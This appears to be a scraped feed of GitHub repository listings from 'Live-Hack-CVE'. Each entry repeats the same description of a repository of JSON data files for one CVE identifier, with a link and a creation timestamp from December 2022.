**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40105 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40105](https://github.com/Live-Hack-CVE/CVE-2022-40105) create time: 2022-12-24T22:46:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40101 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40101](https://github.com/Live-Hack-CVE/CVE-2022-40101) create time: 2022-12-24T22:46:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36338](https://github.com/Live-Hack-CVE/CVE-2022-36338) create time: 2022-12-24T22:46:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-1281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-1281](https://github.com/Live-Hack-CVE/CVE-2010-1281) create time: 2022-12-24T21:19:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-5908 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-5908](https://github.com/Live-Hack-CVE/CVE-2013-5908) create time: 2022-12-24T21:20:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2265 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2265](https://github.com/Live-Hack-CVE/CVE-2014-2265) create time: 2022-12-24T22:07:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0207](https://github.com/Live-Hack-CVE/CVE-2014-0207) create time: 2022-12-24T21:58:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2497](https://github.com/Live-Hack-CVE/CVE-2014-2497) create time: 2022-12-24T21:58:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2431 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2431](https://github.com/Live-Hack-CVE/CVE-2014-2431) create time: 2022-12-24T21:20:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0147 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0147](https://github.com/Live-Hack-CVE/CVE-2014-0147) create time: 2022-12-24T21:18:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0144](https://github.com/Live-Hack-CVE/CVE-2014-0144) create time: 2022-12-24T21:17:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0148](https://github.com/Live-Hack-CVE/CVE-2014-0148) create time: 2022-12-24T21:17:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4836](https://github.com/Live-Hack-CVE/CVE-2015-4836) create time: 2022-12-24T21:20:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3884](https://github.com/Live-Hack-CVE/CVE-2015-3884) create time: 2022-12-24T21:19:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2338](https://github.com/Live-Hack-CVE/CVE-2016-2338) create time: 2022-12-24T21:18:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3318](https://github.com/Live-Hack-CVE/CVE-2017-3318) create time: 2022-12-24T21:20:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10268 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10268](https://github.com/Live-Hack-CVE/CVE-2017-10268) create time: 2022-12-24T21:20:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3317](https://github.com/Live-Hack-CVE/CVE-2017-3317) create time: 2022-12-24T21:20:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13046](https://github.com/Live-Hack-CVE/CVE-2019-13046) create time: 2022-12-24T21:17:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-12937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-12937](https://github.com/Live-Hack-CVE/CVE-2019-12937) create time: 2022-12-24T21:17:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13048 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13048](https://github.com/Live-Hack-CVE/CVE-2019-13048) create time: 2022-12-24T21:17:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13047](https://github.com/Live-Hack-CVE/CVE-2019-13047) create time: 2022-12-24T21:17:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13049](https://github.com/Live-Hack-CVE/CVE-2019-13049) create time: 2022-12-24T21:16:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25626](https://github.com/Live-Hack-CVE/CVE-2020-25626) create time: 2022-12-24T22:01:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-4757 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-4757](https://github.com/Live-Hack-CVE/CVE-2020-4757) create time: 2022-12-24T22:01:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14664 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14664](https://github.com/Live-Hack-CVE/CVE-2020-14664) create time: 2022-12-24T21:58:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27778](https://github.com/Live-Hack-CVE/CVE-2020-27778) create time: 2022-12-24T21:58:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35532 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35532](https://github.com/Live-Hack-CVE/CVE-2020-35532) create time: 2022-12-24T21:21:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35531](https://github.com/Live-Hack-CVE/CVE-2020-35531) create time: 2022-12-24T21:21:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35530](https://github.com/Live-Hack-CVE/CVE-2020-35530) create time: 2022-12-24T21:21:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20444](https://github.com/Live-Hack-CVE/CVE-2020-20444) create time: 2022-12-24T21:20:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22201](https://github.com/Live-Hack-CVE/CVE-2020-22201) create time: 2022-12-24T21:19:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21784 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21784](https://github.com/Live-Hack-CVE/CVE-2020-21784) create time: 2022-12-24T21:19:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20467](https://github.com/Live-Hack-CVE/CVE-2020-20467) create time: 2022-12-24T21:19:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20470 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20470](https://github.com/Live-Hack-CVE/CVE-2020-20470) create time: 2022-12-24T21:19:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35674 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35674](https://github.com/Live-Hack-CVE/CVE-2020-35674) create time: 2022-12-24T21:18:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27601 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27601](https://github.com/Live-Hack-CVE/CVE-2020-27601) create time: 2022-12-24T21:17:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35675 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35675](https://github.com/Live-Hack-CVE/CVE-2020-35675) create time: 2022-12-24T21:17:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27602](https://github.com/Live-Hack-CVE/CVE-2020-27602) create time: 2022-12-24T21:17:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35036 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35036](https://github.com/Live-Hack-CVE/CVE-2021-35036) create time: 2022-12-24T22:06:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28052 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28052](https://github.com/Live-Hack-CVE/CVE-2021-28052) create time: 2022-12-24T22:05:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24890](https://github.com/Live-Hack-CVE/CVE-2021-24890) create time: 2022-12-24T22:03:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38138 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38138](https://github.com/Live-Hack-CVE/CVE-2021-38138) create time: 2022-12-24T22:02:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24284](https://github.com/Live-Hack-CVE/CVE-2021-24284) create time: 2022-12-24T22:01:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45078 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45078](https://github.com/Live-Hack-CVE/CVE-2021-45078) create time: 2022-12-24T22:01:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4145 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4145](https://github.com/Live-Hack-CVE/CVE-2021-4145) create time: 2022-12-24T22:01:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39714 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39714](https://github.com/Live-Hack-CVE/CVE-2021-39714) create time: 2022-12-24T22:01:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28699 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28699](https://github.com/Live-Hack-CVE/CVE-2021-28699) create time: 2022-12-24T22:01:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28698](https://github.com/Live-Hack-CVE/CVE-2021-28698) create time: 2022-12-24T22:00:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28697](https://github.com/Live-Hack-CVE/CVE-2021-28697) create time: 2022-12-24T22:00:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28696](https://github.com/Live-Hack-CVE/CVE-2021-28696) create time: 2022-12-24T22:00:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28695](https://github.com/Live-Hack-CVE/CVE-2021-28695) create time: 2022-12-24T22:00:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28694 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28694](https://github.com/Live-Hack-CVE/CVE-2021-28694) create time: 2022-12-24T22:00:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3497](https://github.com/Live-Hack-CVE/CVE-2021-3497) create time: 2022-12-24T22:00:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3522 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3522](https://github.com/Live-Hack-CVE/CVE-2021-3522) create time: 2022-12-24T21:59:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30551](https://github.com/Live-Hack-CVE/CVE-2021-30551) create time: 2022-12-24T21:59:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33515 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33515](https://github.com/Live-Hack-CVE/CVE-2021-33515) create time: 2022-12-24T21:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36976 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36976](https://github.com/Live-Hack-CVE/CVE-2021-36976) create time: 2022-12-24T21:59:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3530](https://github.com/Live-Hack-CVE/CVE-2021-3530) create time: 2022-12-24T21:59:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38604](https://github.com/Live-Hack-CVE/CVE-2021-38604) create time: 2022-12-24T21:59:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45035 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45035](https://github.com/Live-Hack-CVE/CVE-2021-45035) create time: 2022-12-24T21:59:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22725 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22725](https://github.com/Live-Hack-CVE/CVE-2021-22725) create time: 2022-12-24T21:58:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22724 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22724](https://github.com/Live-Hack-CVE/CVE-2021-22724) create time: 2022-12-24T21:57:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41433](https://github.com/Live-Hack-CVE/CVE-2021-41433) create time: 2022-12-24T21:57:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34559](https://github.com/Live-Hack-CVE/CVE-2021-34559) create time: 2022-12-24T21:24:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34565](https://github.com/Live-Hack-CVE/CVE-2021-34565) create time: 2022-12-24T21:24:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34563 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34563](https://github.com/Live-Hack-CVE/CVE-2021-34563) create time: 2022-12-24T21:24:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34562](https://github.com/Live-Hack-CVE/CVE-2021-34562) create time: 2022-12-24T21:24:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34561](https://github.com/Live-Hack-CVE/CVE-2021-34561) create time: 2022-12-24T21:24:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21906](https://github.com/Live-Hack-CVE/CVE-2022-21906) create time: 2022-12-24T22:07:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40099](https://github.com/Live-Hack-CVE/CVE-2022-40099) create time: 2022-12-24T22:07:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40098 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40098](https://github.com/Live-Hack-CVE/CVE-2022-40098) create time: 2022-12-24T22:07:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40097 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40097](https://github.com/Live-Hack-CVE/CVE-2022-40097) create time: 2022-12-24T22:07:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26700 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26700](https://github.com/Live-Hack-CVE/CVE-2022-26700) create time: 2022-12-24T22:07:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39256](https://github.com/Live-Hack-CVE/CVE-2022-39256) create time: 2022-12-24T22:07:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37703 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37703](https://github.com/Live-Hack-CVE/CVE-2022-37703) create time: 2022-12-24T22:06:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22610 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22610](https://github.com/Live-Hack-CVE/CVE-2022-22610) create time: 2022-12-24T22:06:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22624 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22624](https://github.com/Live-Hack-CVE/CVE-2022-22624) create time: 2022-12-24T22:06:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22628](https://github.com/Live-Hack-CVE/CVE-2022-22628) create time: 2022-12-24T22:06:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32782 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32782](https://github.com/Live-Hack-CVE/CVE-2022-32782) create time: 2022-12-24T22:06:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22637 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22637](https://github.com/Live-Hack-CVE/CVE-2022-22637) create time: 2022-12-24T22:06:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37346 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37346](https://github.com/Live-Hack-CVE/CVE-2022-37346) create time: 2022-12-24T22:06:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37193](https://github.com/Live-Hack-CVE/CVE-2022-37193) create time: 2022-12-24T22:06:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31367 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31367](https://github.com/Live-Hack-CVE/CVE-2022-31367) create time: 2022-12-24T22:06:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23006 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23006](https://github.com/Live-Hack-CVE/CVE-2022-23006) create time: 2022-12-24T22:06:26Z

